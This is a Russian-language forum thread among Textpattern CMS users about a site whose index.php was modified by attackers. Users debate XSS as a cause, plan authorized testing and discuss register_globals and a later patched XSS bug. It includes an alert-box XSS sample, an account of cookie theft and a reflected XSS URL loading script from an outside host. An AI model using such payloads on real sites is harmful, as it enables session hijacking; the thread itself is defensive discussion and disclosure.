форум общения русскоязычных пользователей CMS Текстпаттерн
Вы не зашли.
Тут мне конфиденциально написали, что на ТхП сайте злоумышленниками был модифицирован index.php, куда был вставлен инородный код.
Подобное в общем-то уже было здесь и здесь. Но тогда ТхП был не причем.
Что имеем в этот раз?
Версия ТхП - 4.0.3
Установлено много редких и самописных плагинов.
FTP-пароль - только у одного пользователя. Наряду с FTP-паролем к этому сайту - на компе лежали и пароли к другим сайтам, на которых деструктивных действий замечено не было. Т.е. троян, похоже, отпадает.
Хостер из малоизвестных, но проверенный (не назван). То есть взлом со стороны хостера владельцем исключается.
У владельца сайта подозрение на XSS.
Я проверил контролируемые мной сайты, работающие под 4.0.3 - там все нормально.
По поводу XSS.
Слышал много про нее, но не вникал. Пробежался по Гуглам - сложилось впечатление, что XSS не ориентирован на модификацию исходных файлов.
Если есть знающие - пусть просвятят по изложенным симптомам - в чем может быть причина? Похоже это на XSS-атаку?
Но весть плохая :-(
Придется апгрейдить все сайты на 4.0.5.
Большая просьба проверить все сайты под 4.0.3 и если есть какие подозрения - поставить общественность в известность.
Если нет желания говорить публично, то можно сообщить персонально.
Если неудобно светить имя сайта (как в этом случае) - сохраним все в тайне.
P.S. Цитата с какого-то сайта по безопасности
ЕДИНСТВЕННАЯ СИТУАЦИЯ, КОГДА ТЫ МОЖЕШЬ НЕ БЕСПОКОИТЬСЯ О БЕЗОПАСНОСТИ САЙТА В ПЛАНЕ XSS — ЭТО ЕСЛИ ОН СОДЕРЖИТ ИСКЛЮЧИТЕЛЬНО СТАТИЧЕСКИЕ TXT И HTML-СТРАНИЦЫ
Отредактированно Evgeny (10-07-2007 18:14:43)
Неактивен
Ерунда какая-то. Если ещё всё в верхнем регистре, то больше похоже на истерику, чем на что-то реальное.
Неактивен
Это я, видимо, неуместно, процитировал какой-то - да, истерический лозунг, с какого-то сайта по безопасности.
Отредактировал свое предыдущее сообщение.
Неактивен
Но в двух темах в этом форуме TxP к этому не имел никакого отношения. Т.е. виной были настройки сервера. Отсюда и нужно начинать смотреть. Неплохо было бы посмотреть файл, пермишены на файлы и директории, конфиги и т.п., прежде чем делать громкие заявления про взлом. IMHO.
Неактивен
Evgeny, есть замечательная прога Xspider, межсайтовый скриптинг выявляет "на ура"
О программе:
http://www.ptsecurity.ru/xs7.asp
Загрузить демо-версию
http://www.ptsecurity.ru/xs7download.asp
В демо-версии программа позволяет найти уязвимость, но может не показать расширенный обзор по конкретной уязвимости(в любом случае рекомендую ознакомиться)
У меня есть полная версия программы, но!
У меня нет своих ТхП 4.0.3
У меня не стоит денвер, я не юзаю TP локально.
Мой провайдер вырубает сайт при попытке произвести анализ в сетевом режиме.
Если есть возможность на каком либо сайте санкционировано произвести проверку, то готов предложить свои услуги.
PS: какие еще скрипты работают в связке с TP на сайте упомянутом в первом посте?
Уверен, что проблема не в TP
Отредактированно bons (10-07-2007 19:20:56)
Неактивен
PolyGon написал:
прежде чем делать громкие заявления про взлом.
Согласен.
Я честно говоря, полагаю, что если найдется дыра, то первым это ощутит англоязычной сообщество.
Второй момент. То, что модифицируется index.php - сильно похоже, на утечку FTP пароля. Я к сожалению - не слишком силен во взломах. :-(
НО! я сам постепенно ухожу от 4.0.3.
И вот это предупреждение (от серьезного человека, который сам по каким-то причинам не захотел создавать тему),
только стимулирует ускорение этого ухода.
bons написал:
PS: какие еще скрипты работают в связке с TP на сайте упомянутом в первом посте?
Я тоже спросил об этом. Скрипты не были названы. Скрипты сторонние есть, но на поддоменах.
bons написал:
Уверен, что проблема не в TP
Я тоже так думаю. Но так как серьезность человека, попавшего в такую переделку, не вызывает сомнений, я посчитал, что не надо втихую отсиживаться по кустам.
Не надо расценивать мой пост как панику. :-)
Но бдительность терять тоже не надо. :-))
Отредактированно Evgeny (10-07-2007 21:02:45)
Неактивен
НБдительность она да. Впрочем, мой сайтик уже пробовали на предмет чего-то в этом роде, кажется, безуспешно (тук-тук).
Неактивен
Через неделю могу предоставить сервер для проверки. Можно и конфигурацию оговорить, и несколько заходов произвести. И договор составить, что проводимые работы согласованы сторонами и не являются попыткой взлома, чтобы не было вопросов у тех, кто их задаёт периодически.
Неактивен
PolyGon написал:
Через неделю могу предоставить сервер для проверки.
Круто!
Ну давай подумаем логически. Какие источники для взлома могут быть?
Только там, где пользователь может вводить какие-то данные. Или я ошибаюсь?
Вариант со взломом админ.панели отбросим сразу. Там только подбор пароля может сработать.
Если есть сомнения а админ.панели, то можно поставить дополнительный заслон.
Сразу заметим, что если используется плагин для массовой регистрации (mem_self_register, кажется ), то надежность системы падает (потенциально). и в этом случае доп. заслон ставить не имеет смысла, не поможет.
Стоит ли рассматривать этот вариант?
Следующий момент - Комментарии. Но думаю, что этот кусок кода весь вылизан давным-давно. Плюс - массовое применение ТхП в качестве блога с комментариями дает все основания полагать, что тут вряд ли враг может сделать свою бяку.
Остаются плагины.
Плагин для голосования - вот что первое в голову приходит.
Zem_contact - во вторую :-)
(но Zem-Contact не обращается ни к файловой системе, ни к базе. Он обращается только к sendmail )
других сходу и не вспомню, которые бы позволяли что-то делать пользователю.
Неактивен
Если честно, то лень думать - тяжёлая неделя для этой планеты выдалась. Лучше подготовить план тестирования.
Предлагаю сначала на тестовый сервер поставить "чистые" 4.0.3, 4.0.4, 4.0.5, а потом "сборки" на их основе. Короче - нужно сформировать список "кандидатов".
Будет задействовано 2 или 3 разных сервера с разными OS, Apache, PHP, MySQL и настройками. Число серверов зависит от методик и будет предметом дополнительного обсуждения.
Если это не "поможет" сломать систему, то можно будет оставить одну тестовую систему и дополнять её популярными плагинами.
Неактивен
Evgeny написал:
Если есть знающие - пусть просвятят по изложенным симптомам - в чем может быть причина? Похоже это на XSS-атаку?
Хочу уточнить, что данная атака в общем трудноосуществимая, однако недооценивать её действительно не стоит. Здесь наглядный видео-пример как с помощью xss-дырки был взломан форум секъюлаба.
Основной целью атаки является получение административных реквизитов владельца сайта, путем кражи идентификационных данных из сессии.
Сущность xss-атаки, примерно следующая:
Находиться непосредственно xss-уязвимость на сайте жертвы. Под xss-дыркой подразумевается возможность выполнения скриптов (в основном JavaScript) на стороне клиента.
Причина уязвимости заключается в отсутствии или недостаточной фильтрации небезопасных символов в данных, вводимых пользователем. Например, если при регистрации вместо строки "Вася Пупкин" в поле ввода имени пользователя поместить конструкцию "Вася Пупкин<image src='' onerror=alert('XSS!!!')>", и если после регистрации при выводе данного поля движок не отэкранирует опасные символы, браузер (в большинстве случаев) выплюнет мессаджбокс с надписью «XSS!!!».
Так вот. Далее пишется javascript-код, который не выплевывает мессаджбоксы, а незамысловато тырит кукисы юзера, открывшего в браузере инфицированную хss-кодом страничку. В кукисах-то и находится та самая вкусная информация (пароли, хэши, идентификаторы сессии, и т.д), с помощью которых можно без проблем очутиться в админ-панели сайта-жертвы.
Главной и основной задачей для взломщика – это удачно впарить ядовитую ссылку на ядовитую страничку админу ресурса. В основном используют почту, лички, аськи и т.д. Причем успешность атаки определяется условием нахождения админа в админ-панеле.
Так что, уважаемый Evgeny, если вы недавно ходили по подозрительным ссылкам из-под админки, то вполне возможно, это и есть тот самый симптом xss-атаки.
Таким образом, для профилактики от хss-атак смотрите чаще на ссылки по которым ходите (хотя дырявые браузеры могут жестоко обмануты, подменой урла).
И обязательно закрывайте сессию, тобишь пользуйтесь кнопками/линками "выйти из системы".
Возможно немного сумбурно, но в целом, я полагаю, смысл понятен.
Отредактированно sams (12-07-2007 16:11:10)
Неактивен
sams написал:
Так что, уважаемый Evgeny, если вы недавно ходили по подозрительным ссылкам из-под админки
Ну вот.. связали автора публикации с жертвой атаки :-))
Так и рождаются легенды :-)
sams, спасибо за столь развернутое пояснение. Как понял - XSS ориентирован на получение доступа в админку.
в описываемом случае это было не так. была модификация файла.
Отредактированно Evgeny (12-07-2007 16:47:57)
Неактивен
Evgeny написал:
Ну вот.. связали автора публикации с жертвой атаки :-))
Извиняюсь, за невнимательную ошибку.
Evgeny написал:
Как понял - XSS ориентирован на получение доступа в админку.
в описываемом случае это было не так. была модификация файла.
Имхо, имея доступ к админке, аплоад/модификация/удаление файла(ов) - не такое уж и хитрое дело.
Честно говоря, я совсем недавно познакомился с txp. (Возможно, следующую часть поста можно поместить в ветку про «пеар» , но напишу здесь) С первого взгляда движок заинтересовал меня именно отсутствием публичных эксплоитов под него, т.е. своей безопасностью. Понятно, что по мере популяризации движка в массы, найдутся личности, которые захотят проверить его на прочность, и которые найдут таки слабые места (и, судя по этой ветке, вероятно, они уже имеются). Однако сейчас я понемногу уже въехал в концепцию движка, представляющий собой конструктор лего, где txp-тэги выступают в роле деталек, и понял что это довольно интересный проект с интересным сообществом.
Появилось желание разобраться и сделать блог на данном движке, и соответственно попытаться сделать его ещё безопаснее. Посему с удовольствием помогу в «ломании» тестовых систем PolyGon’a
Ну и вдогонку, предложу завести на форуме раздел «Безопасность», в котором бы освещались подобные темы.
Отредактированно sams (12-07-2007 18:50:26)
Неактивен
sams написал:
Возможно, следующую часть поста можно поместить в ветку про «пеар»
Если считаешь нужным поместить- помещай :-)
sams написал:
Посему с удовольствием помогу в «ломании» тестовых систем PolyGon’a
Напиши ему письмо. и сообщи об этом :-)
Мне кажется подготовку с конкретными деталями тестирования лучше всего переносить в приват, здесь оставляя только общие вопросы.
sams написал:
Ну и вдогонку, предложу завести на форуме раздел «Безопасность», в котором бы освещались подобные темы.
За всю историю форума подобный топик- третий. Здесь же, в первом посте, указаны ссылки на предыдущет два.
Неактивен
Коллеги, возвращаясь к тестированию TxP "на пробой". Прошу описать методы, которые будут применяться. После согласования процедуры тестирования дам доступ к первой партии 4.0.4. и 4.0.5.
Неактивен
Будет анализироваться контент: осуществляться поиск уязвимостей(sql-инъекции, удаленное выполнение команд, просмотр произвольных файлов, межсайтовый скриптинг) в get и post запросах, сложная проверка по алгоритмам.
Анализироваться контент будет программно с помощью приложения Xspider.
попытаемся не устраивать DoS
Нужны: адреса хостов
Связь
Отредактированно bons (18-07-2007 00:20:14)
Неактивен
в качестве объекта тестирования предлагется использовать сборку Txp-Блог версии 4.0.4, у которой, после установки надо снять ограничение по сроку добавления комменатриев к статьям.
В ближайшее время, если есть в этом необходимость, переведу сборку на 4.0.5.
Это так и так надо делать, но все руки не дойдут :-( А тут стимул будет :-)
Неактивен
После некотоого внутреннего расследования пострадавший написал, что склоняется к мысли , что это, все же был троян.
В процессе изучения ситуации выяснилось, что глобальные переменные у него были включены.
Желательно всем проверить состояние своего .htaccess !
Если в вашем - строка
php_value register_globals 0
закомментирована - раскомментируйте ее.
После чего обязательно проверьте работоспособность сайта!
Если все ок, то так и оставьте.
Отредактированно Evgeny (01-08-2007 18:41:37)
Неактивен
Evgeny написал:
После некотоого внутреннего расследования пострадавший написал, что склоняется к мысли , что это, все же был троян.
В процессе изучения ситуации выяснилось, что глобальные переменные у него были включены.
Желательно всем проверить состояние своего .htaccess !
Если в вашем - строка
php_value register_globals 0
закомментирована - раскомментируйте ее.
После чего обязательно проверьте работоспособность сайта!
Если все ок, то так и оставьте.
Я попробовал это сделать но в результате этого сайт перестает работать, выводится сообщение Internal Server Error. Версия TXP 4.2.0 Почему такое может быть?
Неактивен
register_globals уже давно отключено на всех нормальных хостингах. В противном случае в диагностике ТХП выводится сообщение об этом. О том, как отключить эту функцию, лучше узнать у своего хостера.
Неактивен
Ясно, буду узнавать.
Вот мне на днях сообщили что на моём сайте есть уязвимость:
"http://domen.com/textpattern/index.php?event=<SCRIPT type=text/javascript src=http://httpz.ru/y3c8l1t9awgo.js></SCRIPT>
ВОТ ПАССИВНАЯ XSS"
Как же можно закрыть эту уязвимость?
Неактивен
1. Это работает только когда вы залогинены на сайте.
2. Зачем вы открываете ссылки с явно странными урлами?
3. Пойду сообщу разработчикам - может что-нить придумают.
Неактивен
Changes in 4.3.0
* Security: Fixed two XSS vulnerabilities (thanks Jorge Hoya and High-Tech Bridge). Updates are recommended.
Возможно, уже поправлено. Gerich, попробуйте обновиться.
Неактивен
Точно, я по невнимательности не проверил баг на 4.3.0 - в нём добавили htmlspecialchars($event).
Сами изменения тут - http://code.google.com/p/textpattern/so … amp;r=3308
Проверил - в 4.3.0 спец. символы не проходят.
Ответ одного из разработчиков:
Stef Dawson ✆ кому: мне
Hi,
Thanks for bringing it to our attention but this was fixed in r3308
(http://code.google.com/p/textpattern/so … php?r=3308)
So if you're running 4.3.0 you should be protected from this type of
attack. Perhaps you could feed that back to the Russian forum so
there's a record of it out there?
Thanks,
Stef
Так что, ищем новые уязвимости
Неактивен
Спасибо всем большое! Побежал обновлятся! И хакеру тому пойду передам спасибо, что сообщил мне об уязвимости.
Неактивен